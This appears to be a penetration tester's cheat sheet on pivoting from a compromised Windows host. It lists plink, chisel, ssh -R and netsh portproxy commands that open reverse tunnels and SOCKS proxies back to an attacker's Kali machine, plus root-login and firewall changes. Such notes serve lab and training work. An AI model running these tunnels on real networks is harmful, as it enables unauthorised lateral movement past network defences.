Plink
First: We need to change ssh configuration on our kali machine.
PermitRootLogin no #Change This
PermitRootLogin Yes #To This
#Then restart the service
sudo service ssh restart
We can customize the port if port 22 blocked on the report machine.
Second: Let start execute plink command on the victim machine
plink.exe -P 2222 -l root -pw toor -R 445:127.0.0.1:445 10.10.14.12
Plink with id_rsa
Create ssh-keygen and save .pub value into authorized_key
install putty tool and convert id_rsa to .ppk file
└─$ sudo apt install putty-tools
└─$ puttygen id_rsa -o key.ppk
Transfer key.ppk to window machine that we compromised
on window machine, we can use plink to connect to our kali machine fore reverse port
Desktop>plink.exe -R 445:192.168.33.132:445 pwned@10.104.60.242 -i key.ppk -N
Using username "pwned".
Access granted. Press Return to begin session.
We can access via 127.0.0.1:445
Chisel
On kali machine
./chisel server -p 6666 --socks5 –reverse
on window server machine
chisel.exe client 10.10.10.10:6666 R:1080:socks
Then we can use proxychain for remote to target machine via sock proxy
proxychains xfreerdp /u:user /p:password123 /cert:ignore /v:10.10.10.11
Proxychains on Window machine
Create ssh-keygen without password. It will create to file id_rsa and id_rsa.pub
copy value of idrsa.pub and paste into .ssh/authorized_key file
Transfer id_rsa file to window machine we compromise
Connect ssh back to our kali machine
ssh -R 9050 pwned@10.104.60.242 -i id_rsa -f -N
Then on our kali will open port 9050
chisel
└─$ chisel server -p 8888 --reverse &
chisel-window.exe client 10.104.60.242:8888 R:9050:socks &
2022/05/10 03:18:16 client: Connecting to ws://10.104.60.242:8888
2022/05/10 03:18:16 client: Connected (Latency 153.9µs)
on /etc/proxychains4.conf
[ProxyList]
# add proxy here ...
# meanwile
# defaults set to "tor"
socks5 127.0.0.1 9050
Netsh
netsh interface portproxy add v4tov4 listenaddress= listenport= connectaddress= connectport= protocol=tcp
Where:
listenaddress is the IP address to listen on (probably always 0.0.0.0).
listenport is the port to listen on.
connectaddress is the destination IP address.
connectport is the destination port.
protocol to use (always TCP).
Example:
PS C:\Users\Public> netsh interface portproxy add v4tov4 listenaddress=0.0.0.0 listenport=80 connectaddress=192.168.10.1 connectport=80 protocol=tcp
PS C:\Users\Public> netsh interface portproxy add v4tov4 listenaddress=0.0.0.0 listenport=443 connectaddress=192.168.10.1 connectport=443 protocol=tcp
Show the portproxy:
PS C:\>netsh interface portproxy show v4tov4
Listen on ipv4: Connect to ipv4:
Address Port Address Port
--------------- ---------- --------------- ----------
0.0.0.0 80 192.168.10.1 80
0.0.0.0 443 192.168.10.1 443
Remove the portproxy:
PS C:\>netsh interface portproxy delete v4tov4 listenaddress=0.0.0.0 listenport=80
PS C:\>netsh interface portproxy delete v4tov4 listenaddress=0.0.0.0 listenport=443
Create Local Firewall Rule before netsh
PS C:\>New-NetFirewallRule -DisplayName "80-In" -Direction Inbound -Protocol TCP -Action Allow -LocalPort 80
PS C:\>New-NetFirewallRule -DisplayName "443-In" -Direction Inbound -Protocol TCP -Action Allow -LocalPort 443
Remove Local Firewall Rule
PS C:\>Remove-NetFirewallRule -DisplayName "80-In"
PS C:\>Remove-NetFirewallRule -DisplayName "443-In"
